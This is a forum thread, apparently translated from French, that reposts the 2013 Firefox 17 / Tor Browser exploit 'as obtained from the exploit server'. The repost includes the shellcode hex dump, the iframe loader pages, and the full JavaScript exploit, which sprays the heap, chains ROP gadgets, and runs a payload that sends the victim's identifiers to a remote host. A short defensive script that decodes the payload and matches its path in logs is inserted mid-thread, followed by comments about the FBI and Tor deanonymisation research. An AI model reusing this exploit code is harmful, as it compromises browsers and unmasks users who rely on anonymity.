    //  00f0  c3 6a 10 8d b5 e1 02 00  00 56 53 68 99 a5 74 61  |.j.......VSh..ta|
    //  0100  ff d5 85 c0 74 1f fe 8d  89 00 00 00 75 e3 80 bd  |....t.......u...|
    //  0110  4f 02 00 00 01 74 07 e8  3b 01 00 00 eb 05 e8 4d  |O....t..;......M|
    //  0120  01 00 00 ff e7 b8 00 01  00 00 29 c4 89 e2 52 50  |..........)...RP|
    //  0130  52 68 b6 49 de 01 ff d5  5f 81 c4 00 01 00 00 85  |Rh.I...._.......|
    //  0140  c0 0f 85 f2 00 00 00 57  e8 f9 00 00 00 5e 89 ca  |.......W.....^..|
    //  0150  8d bd e9 02 00 00 e8 eb  00 00 00 4f 83 fa 20 7c  |...........O.. ||
    //  0160  05 ba 20 00 00 00 89 d1  56 f3 a4 b9 0d 00 00 00  |.. .....V.......|
    //  0170  8d b5 c4 02 00 00 f3 a4  89 bd 4b 02 00 00 5e 56  |..........K...^V|
    //  0180  68 a9 28 34 80 ff d5 85  c0 0f 84 aa 00 00 00 66  |h.(4...........f|
    //  0190  8b 48 0a 66 83 f9 04 0f  82 9c 00 00 00 8d 40 0c  |.H.f..........@.|
    //  01a0  8b 00 8b 08 8b 09 b8 00  01 00 00 50 89 e7 29 c4  |...........P..).|
    //  01b0  89 e6 57 56 51 51 68 48  72 d2 b8 ff d5 85 c0 81  |..WVQQhHr.......|
    //  01c0  c4 04 01 00 00 0f b7 0f  83 f9 06 72 6c b9 06 00  |...........rl...|
    //  01d0  00 00 b8 10 00 00 00 29  c4 89 e7 89 ca d1 e2 50  |.......).......P|
    //  01e0  52 31 d2 8a 16 88 d0 24  f0 c0 e8 04 3c 09 77 04  |R1.....$....<.w.|
    //  01f0  04 30 eb 02 04 37 88 07  47 88 d0 24 0f 3c 09 77  |.0...7..G..$.<.w|
    //  0200  04 04 30 eb 02 04 37 88  07 47 46 e2 d4 59 29 cf  |..0...7..GF..Y).|
    //  0210  89 fe 58 01 c4 8b bd 4b  02 00 00 f3 a4 c6 85 4f  |..X....K.......O|
    //  0220  02 00 00 01 e8 2e 00 00  00 31 c0 50 51 29 cf 4f  |.........1.PQ).O|
    //  0230  57 53 68 c2 eb 38 5f ff  d5 53 68 75 6e 4d 61 ff  |WSh..8_..ShunMa.|
    //  0240  d5 e9 c8 fe ff ff 31 c9  f7 d1 31 c0 f2 ae f7 d1  |......1...1.....|
    //  0250  49 c3 00 00 00 00 00 8d  bd e9 02 00 00 e8 e4 ff  |I...............|
    //  0260  ff ff 4f b9 4f 00 00 00  8d b5 75 02 00 00 f3 a4  |..O.O.....u.....|
    //  0270  8d bd e9 02 00 00 e8 cb  ff ff ff c3 0d 0a 43 6f  |..............Co|
    //  0280  6e 6e 65 63 74 69 6f 6e  3a 20 6b 65 65 70 2d 61  |nnection: keep-a|
    //  0290  6c 69 76 65 0d 0a 41 63  63 65 70 74 3a 20 2a 2f  |live..Accept: */|
    //  02a0  2a 0d 0a 41 63 63 65 70  74 2d 45 6e 63 6f 64 69  |*..Accept-Encodi|
    //  02b0  6e 67 3a 20 67 7a 69 70  0d 0a 0d 0a 00 83 c7 0e  |ng: gzip........|
    //  02c0  31 c9 f7 d1 31 c0 f3 ae  4f ff e7 0d 0a 43 6f 6f  |1...1...O....Coo|
    //  02d0  6b 69 65 3a 20 49 44 3d  77 73 32 5f 33 32 00 49  |kie: ID=ws2_32.I|
    //  02e0  50 48 4c 50 41 50 49 00  02 00 00 50 41 de ca 36  |PHLPAPI....PA..6|
    //  02f0  47 45 54 20 2f 30 35 63  65 61 34 64 65 2d 39 35  |GET /05cea4de-95|
    //  0300  31 64 2d 34 30 33 37 2d  62 66 38 66 2d 66 36 39  |1d-4037-bf8f-f69|
    //  0310  30 35 35 62 32 37 39 62  62 20 48 54 54 50 2f 31  |055b279bb HTTP/1|
    //  0320  2e 31 0d 0a 48 6f 73 74  3a 20 00 00 00 00 00 00  |.1..Host: ......|
    //  0330  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
    //  *
    //  03b0  00 00 00 00 00 00 00 00  00 00 00 90              |............|
    //  03bc
    
    /****************************************************************************
     * The original files as obtained from the exploit server follow:
     */
    
    //// "content_2.html"
    <html><body></body></html><script>var y="?????",url=window.location.href;if(0>url.indexOf(y)){var iframe=document.createElement("iframe");iframe.src="content_3.html";document.body.appendChild(iframe)}else parent.w();function df(){return parent.df()};</script>
    
    //// "content_3.html"
    <script>var y="?????",z="",z=z+"<body",z=z+">",z=z+"<img",z=z+" height='1' width='1' src='error.html'",z=z+' onerror="javascript: ',z=z+("window.location.href='content_2.html"+y+"';\" "),z=z+">",z=z+"</body",z=z+">",flag=!1,var83=0;
    function b(){for(var e=Array(1024),d=Array(1024),c=0;1024>c;c++)e[c]=new ArrayBuffer(180);for(c=0;1024>c;c++)d[c]=new Int32Array(e[c],0,45),d[c][9]=var83;return d}function a(){!1==flag&&(flag=!0,window.stop());window.stop();b();window.parent.frames[0].frameElement.ownerDocument.write(z);b()}var83=parent.df();0!=var83&&document.addEventListener("readystatechange",a,!1);
    </script>
    
    //// main exploit
    <html>
    <body>
    <iframe frameborder=0  border=0 height=1 width=1 id="iframe"> </iframe>	
    </body>
    </html>
    
    <script>
    
    var var1=0xB0;
    var var2 = new Array(var1);					
    var var3 = new Array(var1);	
    var var4 = new Array(var1);
    
    var var5=0xFF004; 	
    var var6=0x3FC01;  
    
    var var7=0x60000000; 
    var var8=0x18000000; 
    
    
    var var9=1;
    
    var var10 = 0x12000000;
    var var11 = 0;
    var var12=0;        
    
    var var13 =0; 
    
    function df()
    {
    	if(var12==0)
    	{
    		return 0x00000000;
    	}
    	var var14 = var10 + 0x00010000 * var11 + 0x0000002B;
    
    	if( var9 == 1 || var9 == 2)
    		return ( var14 - var12);
    	else
    		return 0x00000000;
    }
    
    function b()
    {
    	var version = al();
    	if(version <17)  
    	{
    		window.location.href="content_1.html";
    	}
    	if( version >=17 && version <18 )
    		var12 = 0xE8;
    	return ;
    }
    
    function c()
    {
    	var iframe=document.getElementById("iframe");
    	iframe.src="content_2.html";
    }
    
    function d()
    {
    	for(var j=0;j<var1;j++)
    	{
    		if( j<var1/8 || j==var1-1)
    		{
    			var tabb = new Array(0x1ED00);
    			var4[j]=tabb;
    			for(i=0;i<0x1ED00;i++)
    			{
    				var4[j][i]=0x11559944;
    			}	
    		}
    		var2[j]= new ArrayBuffer(var5); 
    	}
    	for(var j=0;j<var1;j++)
    	{
    		var3[j]= new Int32Array(var2[j],0,var6);
    		var3[j][0]=0x11336688;   										
    		
    		for(var i=1;i<16;i++)	
    		{  					
    			var3[j][0x4000*i] = 0x11446688;   							
    		}
    			
    	}	
    
    	for(var j=0;j<var1;j++)
    	{
    		if(typeof var4[j] !="undefined")
    		{
    			var4[j][0]=0x22556611;   
    		}
    	}
    }
    
    function e(view)
    {
    	var i=0;
    	for(i=0;i<0x400;i++)
    	{
    		view[i] = var13+0x1010 ; 
    	}
    	view[0x0]=var13+0x1010; 		
    	view[0x44]=0x0;				
    	view[0x45]=0x0;				
    	view[0x400-4]=var13+0x1010; 	
    	view[0x400]=0x00004004;		     		
    	view[0x401]=0x7FFE0300;				
    }
    
    function f(var15,view,var16)
    {
    	var magneto = "";
    	var magneto = ("\ufc60\u8ae8"+"\u0000\u6000"+"\ue589\ud231"+"\u8b64\u3052"+"\u528b\u8b0c"+"\u1452\u728b"+"\u0f28\u4ab7"+"\u3126\u31ff"+"\uacc0\u613c"+"\u027c\u202c"+"\ucfc1\u010d"+"\ue2c7\u52f0"+"\u8b57\u1052"+"\u428b\u013c"+"\u8bd0\u7840"+"\uc085\u4a74"+"\ud001\u8b50"+"\u1848\u588b"+"\u0120\ue3d3"+"\u493c\u348b"+"\u018b\u31d6"+"\u31ff\uacc0"+"\ucfc1\u010d"+"\u38c7\u75e0"+"\u03f4\uf87d"+"\u7d3b\u7524"+"\u58e2\u588b"+"\u0124\u66d3"+"\u0c8b\u8b4b"+"\u1c58\ud301"+"\u048b\u018b"+"\u89d0\u2444"+"\u5b24\u615b"+"\u5a59\uff51"+"\u58e0\u5a5f"+"\u128b\u86eb"+"\u5d05\ubd81"+"\u02e9\u0000"+"\u4547\u2054"+"\u7075\u858d"+"\u02d1\u0000"+"\u6850\u774c"+"\u0726\ud5ff"+"\uc085\u5e74"+"\u858d\u02d8"+"\u0000\u6850"+"\u774c\u0726"+"\ud5ff\uc085"+"\u4c74\u90bb"+"\u0001\u2900"+"\u54dc\u6853"+"\u8029\u006b"+"\ud5ff\udc01"+"\uc085\u3675"+"\u5050\u5050"+"\u5040\u5040"+"\uea68\udf0f"+"\uffe0\u31d5"+"\uf7db\u39d3"+"\u74c3\u891f"+"\u6ac3\u8d10"+"\ue1b5\u0002"+"\u5600\u6853"+"\ua599\u6174"+"\ud5ff\uc085"+"\u1f74\u8dfe"+"\u0089\u0000"+"\ue375\ubd80"+"\u024f\u0000"+"\u7401\ue807"+"\u013b\u0000"+"\u05eb\u4de8"+"\u0001\uff00"+"\ub8e7\u0100"+"\u0000\uc429"+"\ue289\u5052"+"\u6852\u49b6"+"\u01de\ud5ff"+"\u815f\u00c4"+"\u0001\u8500"+"\u0fc0\uf285"+"\u0000\u5700"+"\uf9e8\u0000"+"\u5e00\uca89"+"\ubd8d\u02e9"+"\u0000\uebe8"+"\u0000\u4f00"+"\ufa83\u7c20"+"\uba05\u0020"+"\u0000\ud189"+"\uf356\ub9a4"+"\u000d\u0000"+"\ub58d\u02c4"+"\u0000\ua4f3"+"\ubd89\u024b"+"\u0000\u565e"+"\ua968\u3428"+"\uff80\u85d5"+"\u0fc0\uaa84"+"\u0000\u6600"+"\u488b\u660a"+"\uf983\u0f04"+"\u9c82\u0000"+"\u8d00\u0c40"+"\u008b\u088b"+"\u098b\u00b8"+"\u0001\u5000"+"\ue789\uc429"+"\ue689\u5657"+"\u5151\u4868"+"\ud272\uffb8"+"\u85d5\u81c0"+"\u04c4\u0001"+"\u0f00\u0fb7"+"\uf983\u7206"+"\ub96c\u0006"+"\u0000\u10b8"+"\u0000\u2900"+"\u89c4\u89e7"+"\ud1ca\u50e2"+"\u3152\u8ad2"+"\u8816\u24d0"+"\uc0f0\u04e8"+"\u093c\u0477"+"\u3004\u02eb"+"\u3704\u0788"+"\u8847\u24d0"+"\u3c0f\u7709"+"\u0404\ueb30"+"\u0402\u8837"+"\u4707\ue246"+"\u59d4\ucf29"+
"\ufe89\u0158"+"\u8bc4\u4bbd"+"\u0002\uf300"+"\uc6a4\u4f85"+"\u0002\u0100"+"\u2ee8\u0000"+"\u3100\u50c0"+"\u2951\u4fcf"+"\u5357\uc268"+"\u38eb\uff5f"+"\u53d5\u7568"+"\u4d6e\uff61"+"\ue9d5\ufec8"+"\uffff\uc931"+"\ud1f7\uc031"+"\uaef2\ud1f7"+"\uc349\u0000"+"\u0000\u8d00"+"\ue9bd\u0002"+"\ue800\uffe4"+"\uffff\ub94f"+"\u004f\u0000"+"\ub58d\u0275"+"\u0000\ua4f3"+"\ubd8d\u02e9"+"\u0000\ucbe8"+"\uffff\uc3ff"+"\u0a0d\u6f43"+"\u6e6e\u6365"+"\u6974\u6e6f"+"\u203a\u656b"+"\u7065\u612d"+"\u696c\u6576"+"\u0a0d\u6341"+"\u6563\u7470"+"\u203a\u2f2a"+"\u0d2a\u410a"+"\u6363\u7065"+"\u2d74\u6e45"+"\u6f63\u6964"+"\u676e\u203a"+"\u7a67\u7069"+"\u0a0d\u0a0d"+"\u8300\u0ec7"+"\uc931\ud1f7"+"\uc031\uaef3"+"\uff4f\u0de7"+"\u430a\u6f6f"+"\u696b\u3a65"+"\u4920\u3d44"+"\u7377\u5f32"+"\u3233\u4900"+"\u4850\u504c"+"\u5041\u0049"+"\u0002\u5000"+"\ude41\u36ca"+"\u4547\u2054"+"\u302f\u6335"+"\u6165\u6434"+"\u2d65\u3539"+"\u6431\u342d"+"\u3330\u2d37"+"\u6662\u6638"+"\u662d\u3936"+"\u3530\u6235"+"\u3732\u6239"+"\u2062\u5448"+"\u5054\u312f"+"\u312e\u0a0d"+"\u6f48\u7473"+"\u203a\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u9000"+"");
    	var var29 = magneto;
    	var var17 = "\u9060";
    	var var18 = "\u9061";
    	var var19 = "\uC481\u0000\u0008" ; 
    	var var20 = "\u2589\u3000"+String.fromCharCode((var13 >> 16)  & 0x0000FFFF); 
    	var var21="\u258B\u3000"+String.fromCharCode((var13 >> 16)  & 0x0000FFFF);
    	var var22 = "\uE589"; 
    	var var23 ="\uC3C9";
    	var var24  = "\uE889";         
    	var24 += "\u608D\u90C0";       
    
    	var var25 = var10 + 0x00010000 * var11 + 0x00000030 + 0x00100000;
    	var var26 = var25 + var16*4
    
    	var var27 =""
    	var27 += "\uB890\u2020\u2020";          				      
    	var27 += "\uA390"+ae(var26+0x00);
    	var27 += "\uA390"+ae(var26+0x04);
    	var27 += "\uA390"+ae(var26+0x08);
    	var27 += "\uA390"+ae(var26+0x0C);
    
    	var var28  = var17;
    	var28 += var20;
    	var28 += var19;
    	var28 += var22;
    	var28 += var27;
    	var28 += var29;
        var28 += var21;
        var28 += var18;
        var28 += var23;
    	var var29Array = new Array();
    	var29Array=ag(var28);
    
    	var var29Ad = var13+0x5010;
    	var i=0;
    	var j=0;
    	var var30=var13+0x4048;
    	var var31 = new Array();
    
    	var31[0]=var30; 			
    	var31[1]=var30; 			
    	var31[2]=var30; 			
    	var31[3]=var15[1];			
    	var31[4]=var29Ad;		
    	var31[5]=0xFFFFFFFF;			
    	var31[6]=var13+0x4044;	
    	var31[7]=var13+0x4040;	
    	var31[8]=0x00000040;			
    	var31[9]=var13+0x4048;	
    	var31[10]=0x00040000;		
    	var31[11]=var29Ad;		
    	var31[12]=var13+0x301C;	
    		
    	for(var i=0 ; i < 0x140 ; i++)
    	{
    		var31[i+15]=var15[0]; 
    	}	
    	var var32 = 0x3F8;		
    	view[0x800+0+var32]=var13+0x4018;  
    	view[0x800+1+var32]=var13+0x4018; 
    	for(var i=2 ; i < var31.length  ; i++)
    	{
    		view[0x800+i+var32]=  0x41414141; 
    	}		
    	for(var i=0 ; i < var31.length  ; i++)
    	{
    		view[0xC02+i+var32]=  var31[i];
    	}				
    	for(var i=0 ; i < var29Array.length ; i++)
    	{
    		view[0x1000 + i+var32] = var29Array[i];
    	}			
    	
    }
    
    function g(var50,view)
    {
    	var k = h(var50,view);
    	var j=0;
    	if( k < 0 )
    		return -1;
    	view[0x404+k]=var13+0x3010;
    	return 1;
    }
    
    function h(var50,view)
    {
    	var address=0;
    	var u=0;
    	var memory="";
    	var var55=0;
    	for( u =7; u >=4 ;u--)
    	{
    		address=view[0x404+u];
    		if( address > 0x000A0000 && address < 0x80000000 )  
    		{
    			memory = i(address,0x48,var50,view);
    			var55=af(memory[0x14]+memory[0x15]);
    			if(var55==address)
    			{
    				return u;
    			}				
    		}
    	}
    	return -1;
    }
    
    function i(address,size,var50,view)
    {
    	var var56 = size/2;
    	var56 = var56*0x10 +0x04;
    	view[0x400]=var56;		  
    	view[0x401]=address;     
    	return var4[var50][0];
    }
    
    function j(memory,view)
    {
    	var intArray=ag(memory);
    	for(var i=0 ; i < intArray.length  ; i++)
    	{
    		view[0x404+i]=intArray[i];		
    	}
    }
    
    function k()
    {
    	for(var j=0;j<var1;j++)
    	{
    		if(var2[j].byteLength!=var5)
    		{
    			return j;
    		}
    	}
    	return -1;
    }
    
    function l(view,var58)
    {
    	view[var58] = var13 + 0x1030;	
    	view[var58+1] = 0xFFFFFF85;    		
    }
    
    function m(view,var58)
    {
    	view[var58]=0x00000000;  
    	for(var j=0;j<var1;j++)
    	{
    		if(typeof var4[j] !="undefined")
    		{
    			if(var4[j][0]!=0x22556611) 
    				return j;
    		}
    	}
    	return -1
    }
    
    function n(view,firstvar58)
    {
    	var var57 = var10 + 0x00100000 + 0x00010000 * var11;	
    	var var58=0;
    	for(var i=0;i<200;i++)
    	{
    		if(view[var58] != 0x11336688)  	
    		{
    			if(view[var58] == 0x22556611 )  
    				return  var58;
    			else
    				return -1;
    		}
    		if(var58==0)
    		{
    			var58 = firstvar58;
    		}else{
    			var var59=view[var58-0x0C];
    			var58 = (var59 - var57)/4;
    		}
    	}
    	return -1;
    }
    
    function o(var60)
    {
    	var view  = new Int32Array(var2[var60],0,0x00040400);
    
    	var var59 = view[0x00100000/4-0x0C];
    	var var57 = var10 + 0x00100000 + 0x00010000 * var11;	
    
    	return ((var59 - var57)/4);
    }
    
    function p()
    {
    	for(var j=0;j<var1;j++)
    	{
    		for(var i=1;i<16;i++)
    		{
    			if(var3[j][i*0x4000-0x02]==0x01000000)
    			{
    				return -i;
    			}
    		}
    	}
    	return 0;
    } 
    
    function q(var60)
    {
    	var view  = new Int32Array(var2[var60],0,0x00040400);
    	view[0x00100000/4-0x02]=var7; 
    	if(var2[var60+1].byteLength==var7)
    		return var60+1;
    	return -1;
    }
    
    function r(var60)
    {
    	var view  = new Int32Array(var2[var60],0,0x00040400);
    	view[0x00100000/4-0x02]=var5; 
    }
    
    function t()
    {
    	if(typeof sessionStorage.tempStor !="undefined")
    		return false;
    	sessionStorage.tempStor="";
    	return true;
    }
    
    function u()
    {	
    	if( t() == true )
    	{
    		var9 = 1;		
    		b();
    		d();
    		c();
    	}else{
    		return ;
    	}
    }
    
    function v()
    {
    	if(k() == -1)
    	{
    		var11 = p();
    		var9 = 2;	
    		c();
    	}else{
    		x();
    	}
    }
    
    function w()
    {
    	if(var9==1)
    		v();
    	else
    		x();
    }
    
    function x()
    {
    
    	var var60 = k();
    	if(var60==-1)
    		return ;			
    
    	var nextvar60 = q(var60);
    	if(nextvar60==-1)
    		return ;   				
    		
    	var var61 = o(var60);
    	var var62  = new Int32Array(var2[nextvar60],0,var8);
    	var var58 = n(var62,var61);
    	if(var58==-1)
    		return ;			
    
    	var var50 = m(var62,var58);
    
    	var13 = var10 + 0x00100000 + 0x00010000 * var11; 
    	e(var62);
    
    	l(var62,var58);
    
    	var var64 = var4[var50][0];
    
    	ac(var64,var50,var62,var58,var60);
    }
    
    function y(index)
    {
    	var4[index][1]= document.createElement('span') ;
    }		
    
    function z(index,index2)
    {
    	var4[index][1].innerHTML;
    }		
    
    function aa(view,var63)
    {
    	return view[var63];
    }	
    
    function ab(address,view,var63)
    {
    	view[var63]=address;
    }	
    
    
    function ac(var64,var50,var62,var58,var60)
    {
    	var var15=ah(var64);
    
    	f(var15,var62,var58);
    
    	y(var50);
    	var var66 = aa(var62,var58+2);
    
    	var var67 = i(var66,0x40,var50,var62) ;
    	j(var67,var62);
    
    	g(var50,var62);
    	ab(var13+0x1040 ,var62,var58+2);
    
    	r(var60)
    	setTimeout(ad,1000);
    	z(var50);
    }	
    
    
    function ad()
    {
    	for(var j=0;j<var1;j++)
    	{
    		delete var3[j]
    		var3[j]= null;
    		
    		delete var2[j];
    		var2[j] = null;
    
    		if(typeof var4[j] !="undefined")
    		{
    			delete var4[j];		
    			var4[j] = null;
    		}	
    	}	
    	delete var2;
    	delete var3;
    	delete var4;	
    	var2=null;
    	var3=null;
    	var4=null;	
    }
    		
    function ae(int32)
     {
        var var68 = String.fromCharCode((int32)& 0x0000FFFF);
        var var69 = String.fromCharCode((int32 >> 16)  & 0x0000FFFF);
        return var68+var69;
    }  
        
    		
    function af(string)
    {		
        var var70 = string.charCodeAt(0);
        var var71 = string.charCodeAt(1);
        var var72 = (var71 << 16) + var70;
    	return var72;
    }	
    		
    function ag(string)
    {	
    	if(string.length%2!=0)
    		string+="\u9090";
    	var intArray= new Array();
    	for(var i=0 ; i*2 < string.length; i++ )
    		intArray[i]=af(string[i*2]+string[i*2+1]);
    	return intArray;
    }	
    		
    
    function ah(var73)
    { 
    	var var74 = var73.substring(0,2);
        var var70 = var74.charCodeAt(0);
        var var71 = var74.charCodeAt(1);
        var var75 = (var71 << 16) + var70;
        if (var75 == 0)
        {
            var var76 = var73.substring(32, 34);
            var var70 = var76.charCodeAt(0);
            var var71 = var76.charCodeAt(1);
            var75 = (var71 << 16) + var70;
        }
        var var15 = am(var75);
        if (var15 == -1)
        {
            return;
        }
        return var15
    }
    
    function aj(version)
    {
    	var i = navigator.userAgent.indexOf("Windows NT");
    	if (i != -1)
    		return true;
    	return false;
    }
    
    function ak()
    {
    	var ua = navigator.userAgent;
    	var browser = ua.substring(0, ua.lastIndexOf("/"));
    	browser = browser.substring(browser.lastIndexOf(" ") + 1);
    	if (browser != "Firefox")
    		return -1;
    
    	var version = ua.substring(ua.lastIndexOf("/") + 1);
    	version = parseInt(version.substring(0, version.lastIndexOf(".")));
    	return version;
    }
    
    function al()
    {
    	version = ak();
    
    	if (!aj(version))
    		return -1;
    	return version;
    }
    
    		
    function am(var77)
    {
        var var15 = new Array(2);
         if (var77 % 0x10000 == 0xE510) 					
         {      
            var78 = var77 - 0xE510;
            var15[0] = var78 + 0xE8AE;                   
            var15[1] = var78 + 0xD6EE;                   
        } 
        else if (var77 % 0x10000 == 0x9A90) 			
        {   
            var78 = var77 - 0x69A90;
            var15[0] = var78 + 0x6A063;                 
            var15[1] = var78 + 0x68968;                  
        } 
        else if (var77 % 0x10000 == 0x5E70) 				
        {   
            var78 = var77 - 0x65E70;
            var15[0] = var78 + 0x66413;                  
            var15[1] = var78 + 0x64D34;                 
        } 
        else if (var77 % 0x10000 == 0x35F3) 				
        {   
            var78 = var77 - 0x335F3;
            var15[0] = var78 + 0x4DE13;                  
            var15[1] = var78 + 0x49AB8;                  
        } 
        else if (var77 % 0x10000 == 0x5CA0) 				
        {   
            var78 = var77 - 0x65CA0;
            var15[0] = var78 + 0x66253;                 
            var15[1] = var78 + 0x64B84;                  
        } 
        else if (var77 % 0x10000 == 0x5CD0) 	 			
        {  
            var78 = var77 - 0x65CD0;
            var15[0] = var78 + 0x662A3;                  
            var15[1] = var78 + 0x64BA4;                 
            
        } 
        else if (var77 % 0x10000 == 0x6190)   			
        { 
            var78 = var77 - 0x46190;
            var15[0] = var78 + 0x467D3;                 
            var15[1] = var78 + 0x45000;                   
            
        } 
        else if (var77 % 0x10000 == 0x9CB9) 			
        {   
            var78 = var77 - 0x29CB9;
            var15[0] = var78 + 0x29B83;                
            var15[1] = var78 + 0xFFC8;                  
        } 
        else if (var77 % 0x10000 == 0x9CE9)			
        {   
            var78 = var77 - 0x29CE9;
            var15[0] = var78 + 0x29BB3;                 
            var15[1] = var78 + 0xFFD8;                  
        } 
        else if (var77 % 0x10000 == 0x70B0) 				
        {   
            var78 = var77 - 0x470B0;
            var15[0] = var78 + 0x47733;                  
            var15[1] = var78 + 0x45F18;                
        } 
        else if (var77 % 0x10000 == 0x7090)  			
        {  
            var78 = var77 - 0x47090;
            var15[0] = var78 + 0x476B3;               
            var15[1] = var78 + 0x45F18;                
        } 
        else if (var77 % 0x10000 == 0x9E49)   			
        { 
            var78 = var77 - 0x29E49;
            var15[0] = var78 + 0x29D13;                 
            var15[1] = var78 + 0x10028;                 
        } 
        else if (var77 % 0x10000 == 0x9E69)    		
        {
            var78 = var77 - 0x29E69;
            var15[0] = var78 + 0x29D33;              
            var15[1] = var78 + 0x10018;              
        }
        
        else if (var77 % 0x10000 == 0x9EB9)			
        {
            var78 = var77 - 0x29EB9;	
            var15[0] = var78 + 0x29D83;              
            var15[1] = var78 + 0xFFC8;              
        }
        else 
        {
            return -1;                         
        }
        
        return var15;
    }
    
    window.addEventListener("onload", u(),true);
    
    </script>
    Last edited by SAKAROV, 10 August 2013, 16:10.
    OxyGen Software
    Security, development, training, biomedical computing
    [email protected]
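Added example, not part of the original post and not code from the exploit: a static triage in JavaScript (Node.js) that decodes a slice of the `\u`-escaped string from the listing above into bytes without executing it, recovers the HTTP request line that the hex dump shows, and searches egress log lines for that path. The log lines, client addresses, `intranet.example` and `host.invalid` are constructed, and the function names are this example's own.

```javascript
'use strict';
// Slice of the "\u"-escaped string from the listing (the part the hex dump
// renders as "GET /05cea4de-..."), kept as inert data: it is never executed.
const SAMPLE =
  "\u4547\u2054\u302f\u6335\u6165\u6434\u2d65\u3539\u6431\u342d" +
  "\u3330\u2d37\u6662\u6638\u662d\u3936\u3530\u6235\u3732\u6239" +
  "\u2062\u5448\u5054\u312f\u312e\u0a0d\u6f48\u7473\u203a\u0000\u0000";

// Each UTF-16 code unit is two bytes in memory, low byte first, which is the
// order the listing's af()/ag() helpers use when packing units into words.
function unitsToBytes(str) {
  const out = new Uint8Array(str.length * 2);
  for (let i = 0; i < str.length; i++) {
    const unit = str.charCodeAt(i);
    out[2 * i] = unit & 0xff;
    out[2 * i + 1] = unit >> 8;
  }
  return out;
}

// Runs of printable ASCII (CR and LF allowed) that are at least minLen long.
function asciiRuns(bytes, minLen = 6) {
  const runs = [];
  let cur = '';
  for (const b of bytes) {
    if ((b >= 0x20 && b < 0x7f) || b === 0x0d || b === 0x0a) {
      cur += String.fromCharCode(b);
    } else {
      if (cur.length >= minLen) runs.push(cur);
      cur = '';
    }
  }
  if (cur.length >= minLen) runs.push(cur);
  return runs;
}

// Request targets of any HTTP request lines embedded in the recovered strings.
function embeddedRequestPaths(runs) {
  const paths = [];
  for (const run of runs) {
    for (const m of run.matchAll(/\b(?:GET|POST) (\/\S*) HTTP\/1\.[01]/g)) {
      paths.push(m[1]);
    }
  }
  return paths;
}

// Constructed egress log lines: timestamp, client, method, URL.
const LOG = [
  '2013-08-04T00:03:11Z 10.0.0.21 GET http://intranet.example/index.html',
  '2013-08-04T00:04:52Z 10.0.0.37 GET http://host.invalid/05cea4de-951d-4037-bf8f-f69055b279bb',
  '2013-08-04T00:05:02Z 10.0.0.21 GET http://intranet.example/05cea4de.css',
];

// Log lines whose URL path equals one of the recovered request targets.
function matchLog(lines, paths) {
  return lines.filter((line) => {
    const url = line.split(' ')[3] || '';
    try {
      return paths.includes(new URL(url).pathname);
    } catch (err) {
      return false; // not a parseable absolute URL
    }
  });
}

const PATHS = embeddedRequestPaths(asciiRuns(unitsToBytes(SAMPLE)));
console.log(PATHS, matchLog(LOG, PATHS));
```

The match is on the exact path, so the third constructed line, which only shares a prefix with it, is not reported.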



    • #3
      Basic substitution obfuscation, but clever all the same!
      It would be worth reverse engineering it completely.

      Thanks TorTukiTu for the source.

      EDIT: The script that retrieves the MAC address works with VBS (via ActiveX).
      This flaw is not new. However, it is surprising that Firefox did not keep monitoring it closely. It used to be possible to inject any virus from unprotected VBS code.
      Last edited by Yarflam, 10 August 2013, 17:10.
      ~ Yarflam ~

      ❉ The Universe is heading towards its ultimate perfection ❉



      • #4
        Just a small remark about this news item.

        We have read here and there that anonymity on TOR had been compromised.

        I remind you that this vulnerability does not affect TOR itself, but third-party software, in this case FF17.

        What is more, this choice of exploitation tells us a lot about the knowledge and means the FBI has with regard to TOR:

        It would have been much more effective to target the TOR client directly; it was Firefox that was targeted.

        This has an important implication:
        - The FBI will not or cannot directly break anonymity on the TOR network.

        It is also possible and likely that the FBI has a range of exploits and 0-days for some of the most widespread software, including FF. This implies that users of somewhat more exotic systems are much safer.

        In conclusion, this attack looks more like a publicity stunt intended to scare TOR users away. The same thing could have happened via Freenet.
        It is certain that TOR's growing popularity is a problem for our suit-and-tie friends at us.gouv

        Tortue 974.
        Last edited by TorTukiTu, 13 August 2013, 09:19.


        • #5
          Update: researchers have conducted a study on the possibility of finding the real IP behind an IP belonging to the Tor network. The result is unsurprising:

          In some cases, users can be identified with 95% certainty.

          A regular Tor user can be identified in less than three months with a probability of 50% and in less than six months with a probability of 80%.

          This research will be presented at a conference in November at CCS (Computer and Communications Security) in Berlin.

          http://www.ohmygodel.com/publication...uted-ccs13.pdf

          Enjoy the read.

          Credit: Aaron Johnson (lead of the study)

          After this finding, it is surprising to see that the number of internet users using Tor doubled (worldwide and in France) in only two weeks in August 2013, certainly due to the paranoia generated by PRISM and the like.

          The NSA can rub its hands. The paranoia serves their interests.
          Last edited by SAKAROV, 06 September 2013, 15:26.